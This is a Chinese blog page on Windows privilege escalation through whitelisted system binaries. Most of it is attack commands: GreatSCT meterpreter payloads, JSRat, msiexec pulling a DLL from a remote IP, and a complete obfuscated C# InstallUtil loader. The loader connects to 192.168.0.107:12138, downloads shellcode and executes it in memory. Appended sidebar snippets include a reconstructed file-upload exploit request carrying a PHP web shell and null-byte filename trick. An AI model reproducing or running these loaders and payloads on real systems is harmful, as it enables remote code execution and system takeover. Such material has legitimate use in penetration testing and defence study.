WEB渗透Win提权篇-白名单提权

原创 已于 2024-08-29 11:01:06 修改 · 264 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#WEB安全 #网络安全 #WEB渗透 #渗透测试 #提权

于 2024-08-29 10:59:37 首次发布

提权工具合集包(免费分享): 夸克网盘分享

 往期文章

WEB渗透Win提权篇-提权工具合集-CSDN博客

WEB渗透Win提权篇-RDP&Firewall-CSDN博客

WEB渗透Win提权篇-MSSQL-CSDN博客

WEB渗透Win提权篇-MYSQL-udf-CSDN博客

WEB渗透Win提权篇-AccountSpoofing-CSDN博客

WEB渗透Win提权篇-弱权限提权-CSDN博客

WEB渗透Win提权篇-PowerUp-CSDN博客

WEB渗透Win提权篇-特权文件写入提权-CSDN博客

WEB渗透Win提权篇-MSF提权-CSDN博客

WEB渗透Win提权篇-CVE-2020-1472-CSDN博客 

WEB渗透Win提权篇-白名单提权-CSDN博客

 

GreatSCT
>git clone https://github.com/GreatSCT/GreatSCT.git
>cd GreatSCT/setup&./setup.sh
>use Bypass
>list
>use regasm/meterpreter/rev_tcp.py
>msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
JSRat
>JSRat.py -i 192.168.1.107 -p 4444
Odbcconf.exe
>odbcconf.exe /a {regsvr C:\shell.dll} 可以是任意后缀
Msiexec.exe
>msiexec /y c:\user\admin\desktop\1.dll
>msiexec /q /i http://192.168.0.107/dll.dll
InstallUtil.exe
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:y.exe  /unsafe C:\Users\y\Desktop\1.cs
using System;
using System.Net;
using System.Linq;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Threading;
using System.Configuration.Install;
using System.Windows.Forms;
public class GQLBigHgUniLuVx {
  public static void Main()
  {
    while(true)
    {
  
  { MessageBox.Show("doge"); Console.ReadLine();}}
  }
}
[System.ComponentModel.RunInstaller(true)]
public class esxWUYUTWShqW : System.Configuration.Install.Installer
{
  public override void Uninstall(System.Collections.IDictionary zWrdFAUHmunnu)
  {
    jkmhGrfzsKQeCG.LCIUtRN();
  }
}
public class jkmhGrfzsKQeCG
{ [DllImport("kernel")] private static extern UInt32 VirtualAlloc(UInt32 YUtHhF,UInt32 VenifEUR, UInt32 NIHbxnOmrgiBGL, UInt32 KIheHEUxhAfOI);
[DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 GDmElasSZbx, UInt32 rGECFEZG, UInt32 UyBSrAIp,IntPtr sPEeJlufmodo, UInt32 jmzHRQU, ref UInt32 SnpQPGMvDbMOGmn);
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr pRIwbzTTS, UInt32 eRLAWWYQnq);
static byte[] ErlgHH(string ZwznjBJY,int KsMEeo) {
IPEndPoint qAmSXHOKCbGlysd = new IPEndPoint(IPAddress.Parse(ZwznjBJY), KsMEeo);
Socket XXxIoIXNCle = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
try { XXxIoIXNCle.Connect(qAmSXHOKCbGlysd); }
catch { return null;}
byte[] UmquAHRnhhpuE = new byte[4];
XXxIoIXNCle.Receive(UmquAHRnhhpuE,4,0);
int kFVRSNnpj = BitConverter.ToInt32(UmquAHRnhhpuE,0);
byte[] qaYyFq = new byte[kFVRSNnpj +5];
int SRCDELibA =0;
while(SRCDELibA < kFVRSNnpj)
{ SRCDELibA += XXxIoIXNCle.Receive(qaYyFq, SRCDELibA +5,(kFVRSNnpj - SRCDELibA)<4096 ? (kFVRSNnpj - SRCDELibA) : 4096,0);}
byte[] TvvzOgPLqwcFFv =BitConverter.GetBytes((int)XXxIoIXNCle.Handle);
Array.Copy(TvvzOgPLqwcFFv,0, qaYyFq,1,4); qaYyFq[0]=0xBF;
return qaYyFq;}
static void cmMtjerv(byte[] HEHUjJhkrNS) {
if(HEHUjJhkrNS !=null) {
UInt32 WcpKfU = VirtualAlloc(0,(UInt32)HEHUjJhkrNS.Length,0x1000,0x40);
Marshal.Copy(HEHUjJhkrNS,0,(IntPtr)(WcpKfU), HEHUjJhkrNS.Length);
IntPtr UhxtIFnlOQatrk = IntPtr.Zero;
UInt32 wdjYKFDCCf =0;
IntPtr XVYcQxpp = IntPtr.Zero;
UhxtIFnlOQatrk = CreateThread(0,0, WcpKfU, XVYcQxpp,0, ref wdjYKFDCCf);
WaitForSingleObject(UhxtIFnlOQatrk,0xFFFFFFFF); }}
public static void LCIUtRN() {
byte[] IBtCWU =null; IBtCWU = ErlgHH("192.168.0.107",12138);
cmMtjerv(IBtCWU);
} }
生成exe后执行
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\y.exe
MSF监听12138端口
Compiler.exe
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe 1.xml 1.tcp

image

1.xml
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:stri
最低0.47元/天 解锁文章

200万优质内容无限畅学
WEB渗透Win-工具合集
qq_59468567的博客
08-26 2951
要运⾏ PowerUp,请启动 PowerShell 会话并使⽤ dot 加载脚本,请执⾏以下操。winPEAS 是⼀个⾮常强⼤的⼯具,它不仅积极寻找特升级错误配置,⽽且还在。当使⽤命令⾏时,我们有 使⽤仍具有 /accepteula 命令⾏的旧版本选项。缺点是:程序的最新版本会⽣成⼀个 GUI"接受 EULA" 弹出窗⼝。您可以使⽤它来检查⽤户或组是否有访问⽂件,⽬录,服务和注册表项。accesschk 是⼀个很旧的⼯具了,但我们依然可以尝试去⽤。Seatbelt 是⼀种枚举⼯具。
WEB渗透Win-Searchsploit
qq_59468567的博客
08-30 761
wmic qfe list full|findstr /i hotfix systeminfo>temp.txt&(for %i in (KB2271195 KB2124261 KB2160329 KB2621440 KB2707511 KB2829361 KB2864063 KB3000061 KB3045171 KB3036220 KB3077657 KB3079904 KB3134228 KB3124280 KB3199135) do @type temp.txt|@find /i "%i"||
[渗透测试]主机操作系统渗透Windows浅析
qq_43668710的博客
04-18 665
上日程
-Windows&溢出漏洞&宝塔面板Bypass&CS插件化&MSF模块化
SuperherRo的博客
03-22 1659
1、WebWin系统-限差异原因 2、WebWin系统-溢出漏洞(MSF&CS) 3、WebWin系统-集成软件(哥斯拉模块Bypass) 章节点: 1、Web升及转移 2、系统升及转移 3、宿主升及转移 4、域控升及转移
windows升总结
m0_66458291的博客
03-31 1458
本文总结了常见的windows的几种方式如定时任务、sc、PSExec、进程迁移、烂土豆、passUAC、DLL劫持、不带引号的安全路径问题、修改服务程序的执行路径等等
【内网渗透基础】之-Windows内核网络安全零基础入门到精通实战教程!
qq_41314882的博客
03-18 698
存在于win32k.sys驱动模块中。部分版本Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核限执行任意代码。当用户通过UAC对话框查看可执行文件的数字签名证书详情时,系统会启动一个高限的浏览器进程(如Internet Explorer)来显示证书信息。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
Windows常用方法 (゚益゚メ) 渗透测试
寻觅的博客
03-15 5905
文章目录说明Windows类型准备工作使用PotatoPotato变种 说明 Windows作为一个非常完善和成熟的系统体系,有着十分强大的限管理体系,一般成熟的项目中,也都会有着比较完善的限分级体系,我们一般能获取到的限都是普通用户限。不仅可以利用系统漏洞进行,一些软件程序的缺陷也可以被利用作为的一种方式。 限等级: 普通用户(大部分常规用户) < 管理员(administrator或管理员组其他用户) < 系统管理员,超级管理员(system) window
WEB渗透Win-PrintNightmare
qq_59468567的博客
08-30 809
https://github.com/cube0x0/CVE-2021-1675 >python3 ./CVE-2021-1675.py hackit.local/domain_user:[email protected] '\\192.168.1.215\smb\addCube.dll' >python3 ./CVE-2021-1675.py hackit.local/domain_user:[email protected] 'C:\addCube.dll' 本地执行溢出 >SharpPri
WEB渗透Win-CVE-2020-1472
qq_59468567的博客
08-29 316
使用 IP 地址代替FQDN 用 Windows API 来强制 NTLM 重置密码为Waza1234/Waza1234/Waza1234/从 secretsdump 恢复密码 将本地注册表机密转储到最新版本时,secretsdump 将自动转储明文机器密码(十六进制编码)激活一个虚拟环境来安装impacket。查找 DC 的旧 NT 哈希。执行dcsync导出hash。从一个没加入域的机器测试。执行,并且设置密码为空。
windows系列上
hl1293348082的专栏
04-08 350
渗透测试中,升自己的限是经常遇到的问题,往往在渗透中最容易获取的限就是一个webshell,如果网站是架设在Windows系统上的,这时就可能遇到这样的问题,还有一种情况是在做横向渗透的时候,收集到一些可以远程连接桌面的帐号,这是也需要,在实际的渗透中有很多的地方会需要这个操作,这个系列就主要介绍各种的方式。 基础 在之前首先要做的是对系统的操作系统信息做一些信息收集,关于信息收集的介绍请看之前的文章《Windows环境下的信息收集》,这里简单一下这几条命令: systemin
Kali Linux渗透测试--windows 10入侵和过程
热门推荐
无崖子的博客
08-21 3万+
在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在使用Metasploit成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步。 一、Metasploit对windows 10入侵测试 环境
渗透测试--Windows
songbai220
12-11 909
Windows 常见方法 溢出漏洞(系统) 数据库 第三方应用软件 CMD命令无法执行的原因分析 1、主要原因是CMD.exe被管理员降或者删除,也有可能是组件被删除 2、解决办法通过脚本木马查找可读写目录,上传cmd.exe,调用cmd路径执行命令(找可读写目录不要选带空格的 菜刀设置cmd路径命令:setp c:\wmpub\cmd.exe 常用命令 whoami 查看用户限 systeminfo 查看操作系统,补丁情况 ipconfig 查看当前服务器IP i
渗透测试——方式总结
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是 就是通过各种办法和漏洞,高自己在服务器中的限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进行的方式有哪些) 1.、系统漏洞(Linux、Windows) 2、数据库 3、系统配置错误 4、限继承类 5、第三方软件...
Windows实战——————1、IIS6.exe实战
Fly_鹏程万里
05-14 5001
前言本次iis6.exe是利用iis6.0远程代码执行漏洞获取到一个Meterpreter之后,进行的操作。一切的都是基于一个webshell之后进行的后渗透测试,所以不论你的环境如何,只有你有一个WEBshell,之后你就可以进行相应的操作,但是对于IIS6.exe来说,它主要针对的含有是IIS6服务的主机进行的。iis6.0漏洞利用目标主机:Windows server 200...
对亮神基于白名单 Csc.exe 执行 payload 第七季复现
cxk
05-03 579
待补充
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8743
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于51单片机的智能温控电扇设计.doc
最新发布
08-06
基于51单片机的智能温控电扇设计.doc
C++生成动态库dll项目、及C#调用C++的dll项目,两个项目分开的,配合使用
08-05
C++生成动态库dll项目、及C#调用C++的dll项目,两个项目分开的,配合使用
派蒙语音 在原神中,让世界任务剧情有语音 通过图像采集,图像文字识别,文本转语音实现
08-05
资源下载链接为: https://pan.quark.cn/s/57349e4e0eb0 派蒙语音。在原神中,让世界任务剧情有语音。通过图像采集,图像文字识别,文本转语音实现。(最新、最全版本!打开链接下载即可用!)
POST /upload-labs/Pass-22/index.php HTTP/1.1 Host: 93.179.97.91:13580 Referer: http://93.179.97.91:13580/upload-labs/Pass-22/index.php Content-Type: multipart/form-data; boundary=----geckoformboundary48b7988131f4ad055045ec5fff2f79c8 Accept-Language: en-使传
07-10
<think>首先,用户的问题是:“我想构造上传漏洞利用请求 请问如何构造用于文件上传漏洞测试的HTTP POST请求包”。用户想构造一个HTTP POST请求包,用于测试文件上传漏洞。 从系统级指令中,我有一些引用可以参考: - 引用[1]:到文件上传通常通过HTTP POST请求发送到Web服务器,并描述了服务器的一般检测流程。 - 引用[2]:讨论了文件上传漏洞,包括后缀白名单检测绕过和解析漏洞。特别到了使用test.php%00.jpg这样的文件名来绕过检测。 - 引用[3]:解释了文件上传漏洞的判断方式,包括前端验证(如JavaScript)和如何绕过。 - 引用[4]:给出了一个例子,渗透测试者可以将shell.php改名为shell.php.jpg来绕过客户端验证。 用户的问题是关于构造HTTP POST请求包的具体方法。我需要基于这些引用,供一个结构清晰的回答。 回答结构: 1. **理解文件上传漏洞**:简要解释什么是文件上传漏洞,以及为什么需要构造特定的请求包。 2. **构造请求包的关键元素**:HTTP POST请求包通常包括头部(Headers)和主体(Body)。主体部分包含文件数据和表单字段。 - Content-Type:通常设置为multipart/form-data,因为文件上传使用这种格式。 - Boundary:用于分隔表单字段和文件数据。 - 文件名和内容:这是关键部分,用于测试漏洞,如使用恶意文件名(如包含%00截断)或恶意内容。 3. **绕过检测**:基于引用,讨论如何绕过前端和后端验证。 - 绕过前端验证:如引用[3]所述,前端验证可以用抓包工具(如Burp Suite)修改请求来绕过。 - 绕过后端验证:如引用[2]所述,使用%00截断或利用解析漏洞。 4. **示例请求包**:供一个具体的HTTP POST请求包示例,展示如何构造恶意文件上传请求。 5. **安全考虑**:醒用户只在授环境下进行测试,避免非法使用。 6. **生成相关问题**:根据系统指令,我需要生成相关问题。 现在,构建回答: - **介绍**:解释文件上传漏洞的基本概念。 - **步骤**:逐步指导如何构造请求包。 - **示例**:给出一个完整的HTTP POST请求包示例。 - **相关问题**:在末尾生成几个相关问题。 确保使用中文回答。 参考引用: - [^1]:用于解释上传过程。 - [^2]:用于绕过后缀检测。 - [^3]:用于前端验证绕过。 - [^4]:用于重命名文件绕过。 在回答中自然地添加引用标识。 最终回答结构: 1. 解释文件上传漏洞和构造请求包的目的。 2. 描述HTTP POST请求包的结构。 3. 供绕过验证的方法。 4. 给出一个示例请求包。 5. 安全注意事项。 6. 生成相关问题。</think>### 构造用于文件上传漏洞测试的HTTP POST请求包 文件上传漏洞是Web安全中常见的问题,攻击者通过上传恶意文件(如Web Shell)来获取服务器控制。构造HTTP POST请求包是测试这类漏洞的核心步骤,因为文件上传通常通过POST方法发送multipart/form-data格式的数据[^1]。下面我将一步步指导你如何构造有效的请求包,包括绕过常见检测机制的方法。整个过程基于真实渗透测试实践,确保可靠性和实用性。 #### 1. **理解HTTP POST请求包结构** 文件上传请求包由以下部分组成: - **Headers**:定义请求类型、内容格式等关键信息。 - `Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW`:指定数据格式和边界符(boundary),用于分隔表单字段。 - `Host: target.com`:目标服务器域名。 - `User-Agent: Mozilla/5.0`:模拟浏览器行为,避免被检测为爬虫。 - **Body**:包含表单字段和文件数据,格式为: ``` --boundary Content-Disposition: form-data; name="field_name" field_value --boundary Content-Disposition: form-data; name="file_field"; filename="malicious_filename" Content-Type: application/octet-stream file_content --boundary-- ``` 其中: - `boundary` 是随机生成的字符串(如`----WebKitFormBoundary7MA4YWxkTrZu0gW`),用于分隔数据块。 - `filename` 是上传的文件名,可修改为恶意值(如包含截断符)以绕过检测。 - `file_content` 是文件内容,例如PHP Web Shell(如`<?php system($_GET['cmd']);?>`)。 #### 2. **关键步骤:构造请求包并绕过检测** 基于引用内容,文件上传漏洞测试需绕过服务器检测,常见方法包括: - **绕过前端验证(如JavaScript)**:如果上传前弹出错误示但未发送请求,说明是前端验证(如只允许.jpg文件)[^3]。可使用抓包工具(如Burp Suite)拦截请求并修改`filename`,例如将`.php`文件重命名为`.php.jpg`[^4]。 - **绕过后端验证**: - **后缀白名单绕过**:利用`%00`截断漏洞(Null Byte Injection),在文件名中插入`%00`使服务器忽略后续字符[^2]。例如:`filename="shell.php%00.jpg"`,服务器可能只解析`.php`部分。 - **解析漏洞利用**:如果服务器(如Apache/Nginx)存在解析漏洞,上传`test.php.jpg`可能被当作PHP执行[^2]。 - **Content-Type绕过**:修改`Content-Type`为合法值(如`image/jpeg`),即使文件内容是恶意代码。 以下是构造请求包的通用步骤: 1. **确定目标参数**:使用工具(如Burp Suite或浏览器开发者工具)捕获正常上传请求,获取表单字段名(如`file_upload`)和边界符。 2. **设计恶意文件名和内容**: - 文件名:使用`%00`截断或双重扩展名(如`shell.php.jpg`)。 - 文件内容:插入简单Web Shell,例如`<?php echo system($_REQUEST['cmd']); ?>`。 3. **组装请求包**:确保格式正确,避免语法错误导致服务器拒绝。 #### 3. **示例HTTP POST请求包** 以下是一个完整的恶意文件上传请求包示例,用于测试漏洞。假设目标URL为`http://target.com/upload.php`,表单字段名为`file`,边界符为`----WebKitFormBoundary7MA4YWxkTrZu0gW`: ```http POST /upload.php HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Length: [计算长度] // 需根据实际内容计算 ----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="file"; filename="shell.php%00.jpg" // 使用%00截断绕过后缀检测[^2] Content-Type: image/jpeg // 伪装为合法类型[^3] <?php system($_GET['cmd']); // 恶意Web Shell内容 ?> ----WebKitFormBoundary7MA4YWxkTrZu0gW-- ``` **说明**: - **文件名绕过**:`filename="shell.php%00.jpg"` 利用`%00`截断,使服务器可能只处理`.php`部分[^2]。 - **Content-Type伪装**:设置为`image/jpeg`绕过MIME类型检测[^3]。 - **使用工具**:在Burp Suite中粘贴此请求,发送后检查服务器响应(如HTTP 200 OK),确认文件是否上传成功。如果服务器存在解析漏洞,访问`http://target.com/uploads/shell.php`可执行命令[^2]。 #### 4. **安全注意事项** - **仅用于授测试**:在渗透测试或CTF环境中使用此方法,避免非法攻击。真实测试前,确保获得目标所有者许可。 - **测试工具推荐**:使用Burp Suite、Postman或curl构造和发送请求。Burp Suite可自动处理边界符和内容长度[^4]。 - **常见失败原因**:如果请求被拒绝,检查边界符是否匹配、文件名编码是否正确(`%00`需URL编码)或服务器强化了过滤(如WAF)[^1]。 通过以上步骤,你可以有效构造请求包来测试文件上传漏洞。实践中,结合服务器响应调整文件名和内容,能高漏洞利用成功率[^1][^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值